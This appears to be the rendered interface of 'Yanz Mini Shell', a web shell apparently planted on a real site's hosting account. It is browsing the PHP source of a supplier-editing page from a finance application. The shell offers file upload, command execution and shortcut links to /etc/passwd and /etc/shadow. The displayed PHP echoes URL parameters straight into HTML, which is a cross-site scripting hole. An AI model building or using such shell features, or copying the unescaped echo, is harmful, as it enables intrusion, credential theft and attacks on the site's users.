Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
housgcjs
elaan.net
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php $path="admin/orna/"; require_once('admin/orna/db.php'); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <meta name="keyword" content=""> <title>Edit Supplier</title> <script src="assets/js/now.js"></script> <!-- Bootstrap core CSS --> <link href="assets/css/bootstrap.css" rel="stylesheet"> <link href="assets/css/orna.css" rel="stylesheet"> <!--external css--> <link href="assets/font-awesome/css/font-awesome.css" rel="stylesheet" /> <link rel="stylesheet" type="text/css" href="assets/js/gritter/css/jquery.gritter.css" /> <!-- Custom styles for this template --> <link href="assets/css/style.css" rel="stylesheet"> <link href="assets/css/style-responsive.css" rel="stylesheet"> <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <section id="container"> <!--header start--> <?php require_once('inc-core/header.inc')?> <!--header end--> <!--sidebar start--> <?php require_once('inc-core/side-bar.inc');?> <!--sidebar end--> <!--main content start--> <section id="main-content"> <section class="wrapper site-min-height"> <table class="table table-striped table-advance table-hover"> <thead> <tr> <th class="col-md-12"> <a href="#"> <button class="btn btn-success btn-xs" id="up"><i class="fa fa-save"></i> Update</button> </a> </th> <th class="col-md-10"></th> </tr> </thead> </table> <!--content-start--> <div id="title"> <div class="row"> <div class="col-sm-12"> <h1>Edit Vendor / Supplier / Contractor's Data</h1> <p>Please Edit the fields and press update to confirm changes!</p> </div> </div> </div> <div id="form-wrapper"> <form class="form-inline" id="form" role="form" action="admin/ajax/php/sv.php?t_name1=cust_sup&count=1&row=single&file=false&flimit=0&acc_nm_s=<?php echo pay;?>&no_reply=true&title=" method="POST"> <div class="row"> <div class="col-sm-6"> Name / Title: <input type="text" class="form-control" placeholder="Supplier Name" name="nm" id="acc_title" required> </div> <div class="col-sm-6"> Description: <input class="form-control" placeholder="Description" name="descp"> </div> <div class="col-sm-4"> Cell Number: <input type="text" class="form-control" placeholder="Cell Number" name="cell" required> </div> <div class="col-sm-4"> Email: <input type="email" class="form-control" placeholder="Email" name="eml" required> </div> <div class="col-sm-4"> Choose Category: <select class="form-control" name="acc_sub" disabled> <?php $sql_sub="select * from `".$MySQL_database."`.acc_sub where acc_nm_s in ".pay." order by title ASC"; $query_sub = mysqli_query($connection,$sql_sub); while($sub=mysqli_fetch_assoc($query_sub)){ print "<option value='".$sub['acc_nm_s']."'>".strtoupper($sub['title'])."</option>"; } ?> </select> </div> <div class="col-sm-4"> City: <input type="text" class="form-control" placeholder="City" name="cty" required> </div> <div class="col-sm-8"> Site Address: <input type="text" class="form-control" placeholder="Postal Address" name="adrs" required> </div> </div> <input type="hidden" id="id" value="<?php echo $_GET['id']?>"> <input type="hidden" id="table" value="<?php echo $_GET['table']?>"> <input type="hidden" value="credit" name="cust_type"> <input type="hidden" id="acc_nm_cash" value="<?php echo ccm;?>"> <input type="hidden" name="acc_nm" value="<?php echo ccm;?>"> <!--jsut for insert query dummy value//--> </form> </div> <!--content-end--> </section> <!--/wrapper --> </section><!-- /MAIN CONTENT --> <!--main content end--> <!--footer start--> <footer class="site-footer"> <div class="text-center"> <?php echo date("Y");?> - ProFinance <a href="#" class="go-top"> <i class="fa fa-angle-up"></i> </a> </div> </footer> <!--footer end--> </section> <!-- js placed at the end of the document so the pages load faster --> <script src="assets/js/jquery.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/jquery-ui-1.9.2.custom.min.js"></script> <script src="assets/js/jquery.ui.touch-punch.min.js"></script> <script class="include" type="text/javascript" src="assets/js/jquery.dcjqaccordion.2.7.js"></script> <script src="assets/js/jquery.scrollTo.min.js"></script> <script src="assets/js/jquery.nicescroll.js" type="text/javascript"></script> <!--script for this page--> <script type="text/javascript" src="assets/js/gritter/js/jquery.gritter.js"></script> <script src="admin/ajax/js/cust_sup.js" type="text/javascript"></script> <script src="admin/ajax/js/update.js"></script> <!--common script for all pages--> <script src="assets/js/common-scripts.js"></script> </body> </html>
Free Space : 77942730752 Byte